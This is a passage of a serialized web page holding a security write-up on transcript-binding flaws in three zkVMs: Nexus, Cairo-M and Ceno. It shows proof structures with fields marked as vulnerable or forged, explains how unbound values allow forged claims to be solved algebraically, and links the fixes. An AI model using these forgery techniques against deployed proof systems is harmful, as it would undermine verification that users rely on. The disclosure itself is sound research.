207,"props":124943,"children":124945},{"className":124944},[28989],[124946],{"type":33,"value":1343},{"type":27,"tag":207,"props":124948,"children":124950},{"className":124949},[11294,28860],[124951],{"type":33,"value":26546},{"type":27,"tag":207,"props":124953,"children":124955},{"className":124954},[29011],[124956],{"type":33,"value":10416},{"type":27,"tag":36,"props":124958,"children":124959},{},[124960,124962,124967,124969,124974],{"type":33,"value":124961},"Since each constraint is linear in its ",{"type":27,"tag":84,"props":124963,"children":124965},{"className":124964},[],[124966],{"type":33,"value":122115},{"type":33,"value":124968},", the overall composition polynomial is linear in all ",{"type":27,"tag":84,"props":124970,"children":124972},{"className":124971},[],[124973],{"type":33,"value":122115},{"type":33,"value":124975}," values.",{"type":27,"tag":36,"props":124977,"children":124978},{},[124979,124981],{"type":33,"value":124980},"The verifier checks ",{"type":27,"tag":84,"props":124982,"children":124984},{"className":124983},[11266,11267],[124985],{"type":27,"tag":207,"props":124986,"children":124988},{"className":124987},[11272],[124989],{"type":27,"tag":207,"props":124990,"children":124992},{"className":124991,"ariaHidden":11278},[11277],[124993,125054],{"type":27,"tag":207,"props":124994,"children":124996},{"className":124995},[11283],[124997,125001,125006,125011,125021,125026,125036,125041,125045,125050],{"type":27,"tag":207,"props":124998,"children":125000},{"className":124999,"style":100206},[11288],[],{"type":27,"tag":207,"props":125002,"children":125004},{"className":125003,"style":29392},[11294,28860],[125005],{"type":33,"value":123479},{"type":27,"tag":207,"props":125007,"children":125009},{"className":125008},[28989],[125010],{"type":33,"value":1343},{"type":27,"tag":207,"props":125012,"children":125014},{"className":125013},[11294,33],[125015],{"type":27,"tag":207,"props":125016,"children":125018},{"className":125017},[11294],[125019],{"type":33,"value":125020},"oods",{"type":27,"tag":207,"props":125022,"children":125024},{"className":125023,"style":100264},[11294],[125025],{"type":33,"value":10371},{"type":27,"tag":207,"props":125027,"children":125029},{"className":125028},[11294,33],[125030],{"type":27,"tag":207,"props":125031,"children":125033},{"className":125032},[11294],[125034],{"type":33,"value":125035},"point",{"type":27,"tag":207,"props":125037,"children":125039},{"className":125038},[29011],[125040],{"type":33,"value":10416},{"type":27,"tag":207,"props":125042,"children":125044},{"className":125043,"style":11470},[11372],[],{"type":27,"tag":207,"props":125046,"children":125048},{"className":125047},[11475],[125049],{"type":33,"value":10380},{"type":27,"tag":207,"props":125051,"children":125053},{"className":125052,"style":11470},[11372],[],{"type":27,"tag":207,"props":125055,"children":125057},{"className":125056},[11283],[125058,125062],{"type":27,"tag":207,"props":125059,"children":125061},{"className":125060,"style":122305},[11288],[],{"type":27,"tag":207,"props":125063,"children":125065},{"className":125064},[11294,33],[125066],{"type":27,"tag":207,"props":125067,"children":125069},{"className":125068},[11294],[125070],{"type":33,"value":123804},{"type":27,"tag":36,"props":125072,"children":125073},{},[125074,125076,125081,125083,125088],{"type":33,"value":125075},"With ",{"type":27,"tag":84,"props":125077,"children":125079},{"className":125078},[],[125080],{"type":33,"value":122115},{"type":33,"value":125082}," not in transcript, the composition polynomial becomes a linear function of the ",{"type":27,"tag":84,"props":125084,"children":125086},{"className":125085},[],[125087],{"type":33,"value":122115},{"type":33,"value":125089}," values. Combined with the constraint that claimed sums must sum to zero, this is a small linear system that is easily solvable.",{"type":27,"tag":36,"props":125091,"children":125092},{},[125093,125097,125099],{"type":27,"tag":12606,"props":125094,"children":125095},{},[125096],{"type":33,"value":123960},{"type":33,"value":125098}," Fixed on October 24, 2025 via ",{"type":27,"tag":47,"props":125100,"children":125103},{"href":125101,"rel":125102},"https://github.com/nexus-xyz/nexus-zkvm/pull/503",[51],[125104],{"type":33,"value":125105},"PR #503",{"type":27,"tag":26063,"props":125107,"children":125108},{},[],{"type":27,"tag":58,"props":125110,"children":125112},{"id":125111},"cairo-m-kakarot-labs",[125113],{"type":33,"value":125114},"Cairo-M (Kakarot Labs)",{"type":27,"tag":36,"props":125116,"children":125117},{},[125118],{"type":33,"value":125119},"Cairo-M, built by Kakarot Labs, is an alternative proof system for the Cairo VM (used by Starknet).",{"type":27,"tag":36,"props":125121,"children":125122},{},[125123],{"type":33,"value":125124},"Cairo-M is in many ways similar to Nexus. It uses logup to prove global statements about the execution.",{"type":27,"tag":36,"props":125126,"children":125127},{},[125128],{"type":27,"tag":12606,"props":125129,"children":125130},{},[125131],{"type":33,"value":122666},{"type":27,"tag":101,"props":125133,"children":125135},{"code":125134},"Proof {\n claim: ComponentSizes,\n interaction_claim: LogupClaimsPerComponent,\n public_data: { // \u003C- VULNERABLE\n initial_registers: { pc, fp },\n final_registers: { pc, fp }, // \u003C- forged\n clock, // \u003C- forged\n initial_root, \n final_root, // \u003C- forged\n public_memory: { program, input, output }, //output modified\n },\n stark_proof: [...],\n}\n",[125136],{"type":27,"tag":84,"props":125137,"children":125138},{"__ignoreMap":7},[125139],{"type":33,"value":125134},{"type":27,"tag":36,"props":125141,"children":125142},{},[125143],{"type":27,"tag":12606,"props":125144,"children":125145},{},[125146],{"type":33,"value":122682},{"type":27,"tag":36,"props":125148,"children":125149},{},[125150],{"type":27,"tag":126,"props":125151,"children":125154},{"alt":125152,"src":125153},"7_cairo_m_verification","/posts/zkvms-unfaithful-claims/7_cairo_m_verification.svg",[],{"type":27,"tag":36,"props":125156,"children":125157},{},[125158,125160,125166],{"type":33,"value":125159},"Lookup challenges are derived without ",{"type":27,"tag":84,"props":125161,"children":125163},{"className":125162},[],[125164],{"type":33,"value":125165},"public_data",{"type":33,"value":125167}," being mixed into the transcript.",{"type":27,"tag":36,"props":125169,"children":125170},{},[125171,125172,125177,125179,125184],{"type":33,"value":23888},{"type":27,"tag":84,"props":125173,"children":125175},{"className":125174},[],[125176],{"type":33,"value":125165},{"type":33,"value":125178}," (program I/O, boundary registers, memory roots) enters the lookup relations inside ",{"type":27,"tag":942,"props":125180,"children":125181},{},[125182],{"type":33,"value":125183},"denominators",{"type":33,"value":125185}," through challenge-weighted encodings of tuples. Abstractly, the verifier checks a relation of the form:",{"type":27,"tag":36,"props":125187,"children":125188},{},[125189],{"type":27,"tag":84,"props":125190,"children":125192},{"className":125191},[11266,11267],[125193],{"type":27,"tag":207,"props":125194,"children":125196},{"className":125195},[11272],[125197],{"type":27,"tag":207,"props":125198,"children":125200},{"className":125199,"ariaHidden":11278},[11277],[125201,125261,125307,125353],{"type":27,"tag":207,"props":125202,"children":125204},{"className":125203},[11283],[125205,125209,125215,125220,125229,125234,125243,125248,125252,125257],{"type":27,"tag":207,"props":125206,"children":125208},{"className":125207,"style":100206},[11288],[],{"type":27,"tag":207,"props":125210,"children":125212},{"className":125211},[11294,28860],[125213],{"type":33,"value":125214},"L",{"type":27,"tag":207,"props":125216,"children":125218},{"className":125217},[28989],[125219],{"type":33,"value":1343},{"type":27,"tag":207,"props":125221,"children":125223},{"className":125222},[11294,33],[125224],{"type":27,"tag":207,"props":125225,"children":125227},{"className":125226},[11294],[125228],{"type":33,"value":68907},{"type":27,"tag":207,"props":125230,"children":125232},{"className":125231,"style":100264},[11294],[125233],{"type":33,"value":10371},{"type":27,"tag":207,"props":125235,"children":125237},{"className":125236},[11294,33],[125238],{"type":27,"tag":207,"props":125239,"children":125241},{"className":125240},[11294],[125242],{"type":33,"value":9468},{"type":27,"tag":207,"props":125244,"children":125246},{"className":125245},[29011],[125247],{"type":33,"value":10416},{"type":27,"tag":207,"props":125249,"children":125251},{"className":125250,"style":11373},[11372],[],{"type":27,"tag":207,"props":125253,"children":125255},{"className":125254},[11378],[125256],{"type":33,"value":2227},{"type":27,"tag":207,"props":125258,"children":125260},{"className":125259,"style":11373},[11372],[],{"type":27,"tag":207,"props":125262,"children":125264},{"className":125263},[11283],[125265,125269,125279,125284,125294,125298,125303],{"type":27,"tag":207,"props":125266,"children":125268},{"className":125267,"style":100206},[11288],[],{"type":27,"tag":207,"props":125270,"children":125272},{"className":125271},[11294,33],[125273],{"type":27,"tag":207,"props":125274,"children":125276},{"className":125275},[11294],[125277],{"type":33,"value":125278},"(other transcript",{"type":27,"tag":207,"props":125280,"children":125282},{"className":125281,"style":100264},[11294],[125283],{"type":33,"value":10371},{"type":27,"tag":207,"props":125285,"children":125287},{"className":125286},[11294,33],[125288],{"type":27,"tag":207,"props":125289,"children":125291},{"className":125290},[11294],[125292],{"type":33,"value":125293},"bound terms)",{"type":27,"tag":207,"props":125295,"children":125297},{"className":125296,"style":11470},[11372],[],{"type":27,"tag":207,"props":125299,"children":125301},{"className":125300},[11475],[125302],{"type":33,"value":10380},{"type":27,"tag":207,"props":125304,"children":125306},{"className":125305,"style":11470},[11372],[],{"type":27,"tag":207,"props":125308,"children":125310},{"className":125309},[11283],[125311,125316,125321,125326,125331,125335,125340,125344,125349],{"type":27,"tag":207,"props":125312,"children":125315},{"className":125313,"style":125314},[11288],"height:0.8778em;vertical-align:-0.1944em;",[],{"type":27,"tag":207,"props":125317,"children":125319},{"className":125318},[11294],[125320],{"type":33,"value":1660},{"type":27,"tag":207,"props":125322,"children":125324},{"className":125323},[11404],[125325],{"type":33,"value":11407},{"type":27,"tag":207,"props":125327,"children":125330},{"className":125328,"style":125329},[11372],"margin-right:2em;",[],{"type":27,"tag":207,"props":125332,"children":125334},{"className":125333,"style":11411},[11372],[],{"type":27,"tag":207,"props":125336,"children":125338},{"className":125337},[11294,28860],[125339],{"type":33,"value":125214},{"type":27,"tag":207,"props":125341,"children":125343},{"className":125342,"style":11470},[11372],[],{"type":27,"tag":207,"props":125345,"children":125347},{"className":125346},[11475],[125348],{"type":33,"value":10380},{"type":27,"tag":207,"props":125350,"children":125352},{"className":125351,"style":11470},[11372],[],{"type":27,"tag":207,"props":125354,"children":125356},{"className":125355},[11283],[125357,125362,125419,125423,125641],{"type":27,"tag":207,"props":125358,"children":125361},{"className":125359,"style":125360},[11288],"height:1.4071em;vertical-align:-0.562em;",[],{"type":27,"tag":207,"props":125363,"children":125365},{"className":125364},[28896],[125366,125371],{"type":27,"tag":207,"props":125367,"children":125369},{"className":125368,"style":28903},[28896,28901,28902],[125370],{"type":33,"value":116046},{"type":27,"tag":207,"props":125372,"children":125374},{"className":125373},[11309],[125375],{"type":27,"tag":207,"props":125376,"children":125378},{"className":125377},[11314,28914],[125379,125408],{"type":27,"tag":207,"props":125380,"children":125382},{"className":125381},[11319],[125383,125403],{"type":27,"tag":207,"props":125384,"children":125386},{"className":125385,"style":121458},[11324],[125387],{"type":27,"tag":207,"props":125388,"children":125389},{"style":28927},[125390,125394],{"type":27,"tag":207,"props":125391,"children":125393},{"className":125392,"style":11334},[11333],[],{"type":27,"tag":207,"props":125395,"children":125397},{"className":125396},[11339,11340,11341,11342],[125398],{"type":27,"tag":207,"props":125399,"children":125401},{"className":125400},[11294,28860,11342],[125402],{"type":33,"value":4690},{"type":27,"tag":207,"props":125404,"children":125406},{"className":125405},[29017],[125407],{"type":33,"value":29020},{"type":27,"tag":207,"props":125409,"children":125411},{"className":125410},[11319],[125412],{"type":27,"tag":207,"props":125413,"children":125415},{"className":125414,"style":121738},[11324],[125416],{"type":27,"tag":207,"props":125417,"children":125418},{},[],{"type":27,"tag":207,"props":125420,"children":125422},{"className":125421,"style":11411},[11372],[],{"type":27,"tag":207,"props":125424,"children":125426},{"className":125425},[11294],[125427,125431,125637],{"type":27,"tag":207,"props":125428,"children":125430},{"className":125429},[28989,120769],[],{"type":27,"tag":207,"props":125432,"children":125434},{"className":125433},[120774],[125435],{"type":27,"tag":207,"props":125436,"children":125438},{"className":125437},[11314,28914],[125439,125625],{"type":27,"tag":207,"props":125440,"children":125442},{"className":125441},[11319],[125443,125620],{"type":27,"tag":207,"props":125444,"children":125446},{"className":125445,"style":120787},[11324],[125447,125589,125600],{"type":27,"tag":207,"props":125448,"children":125449},{"style":120791},[125450,125454],{"type":27,"tag":207,"props":125451,"children":125453},{"className":125452,"style":119422},[11333],[],{"type":27,"tag":207,"props":125455,"children":125457},{"className":125456},[11339,11340,11341,11342],[125458],{"type":27,"tag":207,"props":125459,"children":125461},{"className":125460},[11294,11342],[125462,125467,125472,125478,125483,125488,125545,125550,125559,125564,125573,125579,125584],{"type":27,"tag":207,"props":125463,"children":125465},{"className":125464,"style":120808},[11294,28860,11342],[125466],{"type":33,"value":120811},{"type":27,"tag":207,"props":125468,"children":125470},{"className":125469},[11378,11342],[125471],{"type":33,"value":2227},{"type":27,"tag":207,"props":125473,"children":125475},{"className":125474},[28989,11342],[125476],{"type":33,"value":125477},"⟨",{"type":27,"tag":207,"props":125479,"children":125481},{"className":125480,"style":122338},[11294,28860,11342],[125482],{"type":33,"value":122341},{"type":27,"tag":207,"props":125484,"children":125486},{"className":125485},[11404,11342],[125487],{"type":33,"value":11407},{"type":27,"tag":207,"props":125489,"children":125491},{"className":125490},[11294,11342],[125492,125497],{"type":27,"tag":207,"props":125493,"children":125495},{"className":125494},[11294,28860,11342],[125496],{"type":33,"value":29002},{"type":27,"tag":207,"props":125498,"children":125500},{"className":125499},[11309],[125501],{"type":27,"tag":207,"props":125502,"children":125504},{"className":125503},[11314,28914],[125505,125534],{"type":27,"tag":207,"props":125506,"children":125508},{"className":125507},[11319],[125509,125529],{"type":27,"tag":207,"props":125510,"children":125512},{"className":125511,"style":121575},[11324],[125513],{"type":27,"tag":207,"props":125514,"children":125515},{"style":116106},[125516,125520],{"type":27,"tag":207,"props":125517,"children":125519},{"className":125518,"style":116111},[11333],[],{"type":27,"tag":207,"props":125521,"children":125523},{"className":125522},[11339,116116,116117,11342],[125524],{"type":27,"tag":207,"props":125525,"children":125527},{"className":125526},[11294,28860,11342],[125528],{"type":33,"value":4690},{"type":27,"tag":207,"props":125530,"children":125532},{"className":125531},[29017],[125533],{"type":33,"value":29020},{"type":27,"tag":207,"props":125535,"children":125537},{"className":125536},[11319],[125538],{"type":27,"tag":207,"props":125539,"children":125541},{"className":125540,"style":116136},[11324],[125542],{"type":27,"tag":207,"props":125543,"children":125544},{},[],{"type":27,"tag":207,"props":125546,"children":125548},{"className":125547},[28989,11342],[125549],{"type":33,"value":1343},{"type":27,"tag":207,"props":125551,"children":125553},{"className":125552},[11294,33,11342],[125554],{"type":27,"tag":207,"props":125555,"children":125557},{"className":125556},[11294,11342],[125558],{"type":33,"value":68907},{"type":27,"tag":207,"props":125560,"children":125562},{"className":125561,"style":100264},[11294,11342],[125563],{"type":33,"value":10371},{"type":27,"tag":207,"props":125565,"children":125567},{"className":125566},[11294,33,11342],[125568],{"type":27,"tag":207,"props":125569,"children":125571},{"className":125570},[11294,11342],[125572],{"type":33,"value":9468},{"type":27,"tag":207,"props":125574,"children":125576},{"className":125575},[29011,11342],[125577],{"type":33,"value":125578},")⟩",{"type":27,"tag":207,"props":125580,"children":125582},{"className":125581},[11378,11342],[125583],{"type":33,"value":2227},{"type":27,"tag":207,"props":125585,"children":125587},{"className":125586,"style":122393},[11294,28860,11342],[125588],{"type":33,"value":122396},{"type":27,"tag":207,"props":125590,"children":125591},{"style":120824},[125592,125596],{"type":27,"tag":207,"props":125593,"children":125595},{"className":125594,"style":119422},[11333],[],{"type":27,"tag":207,"props":125597,"children":125599},{"className":125598,"style":120834},[120833],[],{"type":27,"tag":207,"props":125601,"children":125602},{"style":120838},[125603,125607],{"type":27,"tag":207,"props":125604,"children":125606},{"className":125605,"style":119422},[11333],[],{"type":27,"tag":207,"props":125608,"children":125610},{"className":125609},[11339,11340,11341,11342],[125611],{"type":27,"tag":207,"props":125612,"children":125614},{"className":125613},[11294,11342],[125615],{"type":27,"tag":207,"props":125616,"children":125618},{"className":125617},[11294,11342],[125619],{"type":33,"value":1651},{"type":27,"tag":207,"props":125621,"children":125623},{"className":125622},[29017],[125624],{"type":33,"value":29020},{"type":27,"tag":207,"props":125626,"children":125628},{"className":125627},[11319],[125629],{"type":27,"tag":207,"props":125630,"children":125633},{"className":125631,"style":125632},[11324],"height:0.562em;",[125634],{"type":27,"tag":207,"props":125635,"children":125636},{},[],{"type":27,"tag":207,"props":125638,"children":125640},{"className":125639},[29011,120769],[],{"type":27,"tag":207,"props":125642,"children":125644},{"className":125643},[11294],[125645],{"type":33,"value":1041},{"type":27,"tag":36,"props":125647,"children":125648},{},[125649,125651],{"type":33,"value":125650},"The global check is then that ",{"type":27,"tag":84,"props":125652,"children":125654},{"className":125653},[11266,11267],[125655],{"type":27,"tag":207,"props":125656,"children":125658},{"className":125657},[11272],[125659],{"type":27,"tag":207,"props":125660,"children":125662},{"className":125661,"ariaHidden":11278},[11277],[125663,125704,125735],{"type":27,"tag":207,"props":125664,"children":125666},{"className":125665},[11283],[125667,125671,125676,125681,125686,125691,125695,125700],{"type":27,"tag":207,"props":125668,"children":125670},{"className":125669,"style":11393},[11288],[],{"type":27,"tag":207,"props":125672,"children":125674},{"className":125673},[11294,28860],[125675],{"type":33,"value":125214},{"type":27,"tag":207,"props":125677,"children":125679},{"className":125678},[28989],[125680],{"type":33,"value":1343},{"type":27,"tag":207,"props":125682,"children":125684},{"className":125683},[11294,28860],[125685],{"type":33,"value":36},{"type":27,"tag":207,"props":125687,"children":125689},{"className":125688},[29011],[125690],{"type":33,"value":10416},{"type":27,"tag":207,"props":125692,"children":125694},{"className":125693,"style":11373},[11372],[],{"type":27,"tag":207,"props":125696,"children":125698},{"className":125697},[11378],[125699],{"type":33,"value":2227},{"type":27,"tag":207,"props":125701,"children":125703},{"className":125702,"style":11373},[11372],[],{"type":27,"tag":207,"props":125705,"children":125707},{"className":125706},[11283],[125708,125712,125722,125726,125731],{"type":27,"tag":207,"props":125709,"children":125711},{"className":125710,"style":11393},[11288],[],{"type":27,"tag":207,"props":125713,"children":125715},{"className":125714},[11294,33],[125716],{"type":27,"tag":207,"props":125717,"children":125719},{"className":125718},[11294],[125720],{"type":33,"value":125721},"(other terms)",{"type":27,"tag":207,"props":125723,"children":125725},{"className":125724,"style":11470},[11372],[],{"type":27,"tag":207,"props":125727,"children":125729},{"className":125728},[11475],[125730],{"type":33,"value":10380},{"type":27,"tag":207,"props":125732,"children":125734},{"className":125733,"style":11470},[11372],[],{"type":27,"tag":207,"props":125736,"children":125738},{"className":125737},[11283],[125739,125743],{"type":27,"tag":207,"props":125740,"children":125742},{"className":125741,"style":101295},[11288],[],{"type":27,"tag":207,"props":125744,"children":125746},{"className":125745},[11294],[125747],{"type":33,"value":1660},{"type":27,"tag":36,"props":125749,"children":125750},{},[125751],{"type":33,"value":125752},"With challenges fixed, this is a rational equation in public data. This is not linear, but still algebraically solvable.",{"type":27,"tag":36,"props":125754,"children":125755},{},[125756],{"type":33,"value":125757},"Public-data coordinates participate in verification relations through extension-field arithmetic (including extension-valued public-memory entries), so the forged-parameter search is a coupled extension-field system.",{"type":27,"tag":36,"props":125759,"children":125760},{},[125761,125765,125767],{"type":27,"tag":12606,"props":125762,"children":125763},{},[125764],{"type":33,"value":123960},{"type":33,"value":125766}," Fixed on October 31, 2025 via ",{"type":27,"tag":47,"props":125768,"children":125771},{"href":125769,"rel":125770},"https://github.com/kkrt-labs/cairo-m/pull/352/commits/92b6740937e904e0002e7ee099fec357127c1d16",[51],[125772],{"type":33,"value":125773},"commit 92b6740",{"type":27,"tag":26063,"props":125775,"children":125776},{},[],{"type":27,"tag":58,"props":125778,"children":125780},{"id":125779},"ceno-scroll",[125781],{"type":33,"value":125782},"Ceno (Scroll)",{"type":27,"tag":36,"props":125784,"children":125785},{},[125786],{"type":33,"value":125787},"Ceno is a zkVM by Scroll, using GKR with a tower sumcheck structure.",{"type":27,"tag":36,"props":125789,"children":125790},{},[125791,125793,125798],{"type":33,"value":125792},"Ceno splits verification into ",{"type":27,"tag":12606,"props":125794,"children":125795},{},[125796],{"type":33,"value":125797},"chips",{"type":33,"value":125799},", with one per opcode or lookup table. Each chip proves its constraints independently.",{"type":27,"tag":36,"props":125801,"children":125802},{},[125803,125805,125810],{"type":33,"value":125804},"Many per-record values (reads, writes, lookups) are batched into a binary tree structure. Each layer folds pairs of values with random challenges; this is the ",{"type":27,"tag":12606,"props":125806,"children":125807},{},[125808],{"type":33,"value":125809},"tower sumcheck",{"type":33,"value":1041},{"type":27,"tag":36,"props":125812,"children":125813},{},[125814],{"type":33,"value":125815},"All read records must match all write records (plus initial/final state). This is checked via a multiset equality, this time using a product instead of logup:",{"type":27,"tag":36,"props":125817,"children":125818},{},[125819],{"type":27,"tag":84,"props":125820,"children":125822},{"className":125821},[11266,11267],[125823],{"type":27,"tag":207,"props":125824,"children":125826},{"className":125825},[11272],[125827],{"type":27,"tag":207,"props":125828,"children":125830},{"className":125829,"ariaHidden":11278},[11277],[125831,126005,126178],{"type":27,"tag":207,"props":125832,"children":125834},{"className":125833},[11283],[125835,125839,125897,125901,125910,125915,125925,125930,125992,125996,126001],{"type":27,"tag":207,"props":125836,"children":125838},{"className":125837,"style":100206},[11288],[],{"type":27,"tag":207,"props":125840,"children":125842},{"className":125841},[28896],[125843,125849],{"type":27,"tag":207,"props":125844,"children":125846},{"className":125845,"style":28903},[28896,28901,28902],[125847],{"type":33,"value":125848},"∏",{"type":27,"tag":207,"props":125850,"children":125852},{"className":125851},[11309],[125853],{"type":27,"tag":207,"props":125854,"children":125856},{"className":125855},[11314,28914],[125857,125886],{"type":27,"tag":207,"props":125858,"children":125860},{"className":125859},[11319],[125861,125881],{"type":27,"tag":207,"props":125862,"children":125864},{"className":125863,"style":121458},[11324],[125865],{"type":27,"tag":207,"props":125866,"children":125867},{"style":28927},[125868,125872],{"type":27,"tag":207,"props":125869,"children":125871},{"className":125870,"style":11334},[11333],[],{"type":27,"tag":207,"props":125873,"children":125875},{"className":125874},[11339,11340,11341,11342],[125876],{"type":27,"tag":207,"props":125877,"children":125879},{"className":125878},[11294,28860,11342],[125880],{"type":33,"value":4690},{"type":27,"tag":207,"props":125882,"children":125884},{"className":125883},[29017],[125885],{"type":33,"value":29020},{"type":27,"tag":207,"props":125887,"children":125889},{"className":125888},[11319],[125890],{"type":27,"tag":207,"props":125891,"children":125893},{"className":125892,"style":121738},[11324],[125894],{"type":27,"tag":207,"props":125895,"children":125896},{},[],{"type":27,"tag":207,"props":125898,"children":125900},{"className":125899,"style":11411},[11372],[],{"type":27,"tag":207,"props":125902,"children":125904},{"className":125903},[11294,33],[125905],{"type":27,"tag":207,"props":125906,"children":125908},{"className":125907},[11294],[125909],{"type":33,"value":101083},{"type":27,"tag":207,"props":125911,"children":125913},{"className":125912,"style":100264},[11294],[125914],{"type":33,"value":10371},{"type":27,"tag":207,"props":125916,"children":125918},{"className":125917},[11294,33],[125919],{"type":27,"tag":207,"props":125920,"children":125922},{"className":125921},[11294],[125923],{"type":33,"value":125924},"out",{"type":27,"tag":207,"props":125926,"children":125928},{"className":125927,"style":100264},[11294],[125929],{"type":33,"value":10371},{"type":27,"tag":207,"props":125931,"children":125933},{"className":125932},[11294],[125934,125944],{"type":27,"tag":207,"props":125935,"children":125937},{"className":125936},[11294,33],[125938],{"type":27,"tag":207,"props":125939,"children":125941},{"className":125940},[11294],[125942],{"type":33,"value":125943},"evals",{"type":27,"tag":207,"props":125945,"children":125947},{"className":125946},[11309],[125948],{"type":27,"tag":207,"props":125949,"children":125951},{"className":125950},[11314,28914],[125952,125981],{"type":27,"tag":207,"props":125953,"children":125955},{"className":125954},[11319],[125956,125976],{"type":27,"tag":207,"props":125957,"children":125959},{"className":125958,"style":100793},[11324],[125960],{"type":27,"tag":207,"props":125961,"children":125962},{"style":121381},[125963,125967],{"type":27,"tag":207,"props":125964,"children":125966},{"className":125965,"style":11334},[11333],[],{"type":27,"tag":207,"props":125968,"children":125970},{"className":125969},[11339,11340,11341,11342],[125971],{"type":27,"tag":207,"props":125972,"children":125974},{"className":125973},[11294,28860,11342],[125975],{"type":33,"value":4690},{"type":27,"tag":207,"props":125977,"children":125979},{"className":125978},[29017],[125980],{"type":33,"value":29020},{"type":27,"tag":207,"props":125982,"children":125984},{"className":125983},[11319],[125985],{"type":27,"tag":207,"props":125986,"children":125988},{"className":125987,"style":100347},[11324],[125989],{"type":27,"tag":207,"props":125990,"children":125991},{},[],{"type":27,"tag":207,"props":125993,"children":125995},{"className":125994,"style":11470},[11372],[],{"type":27,"tag":207,"props":125997,"children":125999},{"className":125998},[11475],[126000],{"type":33,"value":10380},{"type":27,"tag":207,"props":126002,"children":126004},{"className":126003,"style":11470},[11372],[],{"type":27,"tag":207,"props":126006,"children":126008},{"className":126007},[11283],[126009,126014,126071,126075,126084,126089,126098,126103,126165,126169,126174],{"type":27,"tag":207,"props":126010,"children":126013},{"className":126011,"style":126012},[11288],"height:1.1858em;vertical-align:-0.4358em;",[],{"type":27,"tag":207,"props":126015,"children":126017},{"className":126016},[28896],[126018,126023],{"type":27,"tag":207,"props":126019,"children":126021},{"className":126020,"style":28903},[28896,28901,28902],[126022],{"type":33,"value":125848},{"type":27,"tag":207,"props":126024,"children":126026},{"className":126025},[11309],[126027],{"type":27,"tag":207,"props":126028,"children":126030},{"className":126029},[11314,28914],[126031,126060],{"type":27,"tag":207,"props":126032,"children":126034},{"className":126033},[11319],[126035,126055],{"type":27,"tag":207,"props":126036,"children":126038},{"className":126037,"style":121458},[11324],[126039],{"type":27,"tag":207,"props":126040,"children":126041},{"style":28927},[126042,126046],{"type":27,"tag":207,"props":126043,"children":126045},{"className":126044,"style":11334},[11333],[],{"type":27,"tag":207,"props":126047,"children":126049},{"className":126048},[11339,11340,11341,11342],[126050],{"type":27,"tag":207,"props":126051,"children":126053},{"className":126052,"style":121474},[11294,28860,11342],[126054],{"type":33,"value":15937},{"type":27,"tag":207,"props":126056,"children":126058},{"className":126057},[29017],[126059],{"type":33,"value":29020},{"type":27,"tag":207,"props":126061,"children":126063},{"className":126062},[11319],[126064],{"type":27,"tag":207,"props":126065,"children":126067},{"className":126066,"style":121489},[11324],[126068],{"type":27,"tag":207,"props":126069,"children":126070},{},[],{"type":27,"tag":207,"props":126072,"children":126074},{"className":126073,"style":11411},[11372],[],{"type":27,"tag":207,"props":126076,"children":126078},{"className":126077},[11294,33],[126079],{"type":27,"tag":207,"props":126080,"children":126082},{"className":126081},[11294],[126083],{"type":33,"value":56810},{"type":27,"tag":207,"props":126085,"children":126087},{"className":126086,"style":100264},[11294],[126088],{"type":33,"value":10371},{"type":27,"tag":207,"props":126090,"children":126092},{"className":126091},[11294,33],[126093],{"type":27,"tag":207,"props":126094,"children":126096},{"className":126095},[11294],[126097],{"type":33,"value":125924},{"type":27,"tag":207,"props":126099,"children":126101},{"className":126100,"style":100264},[11294],[126102],{"type":33,"value":10371},{"type":27,"tag":207,"props":126104,"children":126106},{"className":126105},[11294],[126107,126116],{"type":27,"tag":207,"props":126108,"children":126110},{"className":126109},[11294,33],[126111],{"type":27,"tag":207,"props":126112,"children":126114},{"className":126113},[11294],[126115],{"type":33,"value":125943},{"type":27,"tag":207,"props":126117,"children":126119},{"className":126118},[11309],[126120],{"type":27,"tag":207,"props":126121,"children":126123},{"className":126122},[11314,28914],[126124,126153],{"type":27,"tag":207,"props":126125,"children":126127},{"className":126126},[11319],[126128,126148],{"type":27,"tag":207,"props":126129,"children":126131},{"className":126130,"style":100793},[11324],[126132],{"type":27,"tag":207,"props":126133,"children":126134},{"style":121381},[126135,126139],{"type":27,"tag":207,"props":126136,"children":126138},{"className":126137,"style":11334},[11333],[],{"type":27,"tag":207,"props":126140,"children":126142},{"className":126141},[11339,11340,11341,11342],[126143],{"type":27,"tag":207,"props":126144,"children":126146},{"className":126145,"style":121474},[11294,28860,11342],[126147],{"type":33,"value":15937},{"type":27,"tag":207,"props":126149,"children":126151},{"className":126150},[29017],[126152],{"type":33,"value":29020},{"type":27,"tag":207,"props":126154,"children":126156},{"className":126155},[11319],[126157],{"type":27,"tag":207,"props":126158,"children":126161},{"className":126159,"style":126160},[11324],"height:0.2861em;",[126162],{"type":27,"tag":207,"props":126163,"children":126164},{},[],{"type":27,"tag":207,"props":126166,"children":126168},{"className":126167,"style":11373},[11372],[],{"type":27,"tag":207,"props":126170,"children":126172},{"className":126171},[11378],[126173],{"type":33,"value":118513},{"type":27,"tag":207,"props":126175,"children":126177},{"className":126176,"style":11373},[11372],[],{"type":27,"tag":207,"props":126179,"children":126181},{"className":126180},[11283],[126182,126186,126191,126201],{"type":27,"tag":207,"props":126183,"children":126185},{"className":126184,"style":11393},[11288],[],{"type":27,"tag":207,"props":126187,"children":126189},{"className":126188},[28989],[126190],{"type":33,"value":1343},{"type":27,"tag":207,"props":126192,"children":126194},{"className":126193},[11294,33],[126195],{"type":27,"tag":207,"props":126196,"children":126198},{"className":126197},[11294],[126199],{"type":33,"value":126200},"state factors",{"type":27,"tag":207,"props":126202,"children":126204},{"className":126203},[29011],[126205],{"type":33,"value":10416},{"type":27,"tag":36,"props":126207,"children":126208},{},[126209],{"type":27,"tag":12606,"props":126210,"children":126211},{},[126212],{"type":33,"value":122666},{"type":27,"tag":101,"props":126214,"children":126216},{"code":126215},"ZKVMChipProof {\n r_out_evals: [[FieldElement]], // \u003C- VULNERABLE\n w_out_evals: [[FieldElement]], // \u003C- VULNERABLE\n lk_out_evals: [[FieldElement]], // \u003C- VULNERABLE\n tower_proof: [...],\n gkr_iop_proof: [...],\n}\n",[126217],{"type":27,"tag":84,"props":126218,"children":126219},{"__ignoreMap":7},[126220],{"type":33,"value":126215},{"type":27,"tag":36,"props":126222,"children":126223},{},[126224,126230,126231,126237,126238,126244],{"type":27,"tag":84,"props":126225,"children":126227},{"className":126226},[],[126228],{"type":33,"value":126229},"r_out_evals",{"type":33,"value":1123},{"type":27,"tag":84,"props":126232,"children":126234},{"className":126233},[],[126235],{"type":33,"value":126236},"w_out_evals",{"type":33,"value":4601},{"type":27,"tag":84,"props":126239,"children":126241},{"className":126240},[],[126242],{"type":33,"value":126243},"lk_out_evals",{"type":33,"value":126245}," are used to initialize the tower sumcheck claim, but they're never absorbed into the 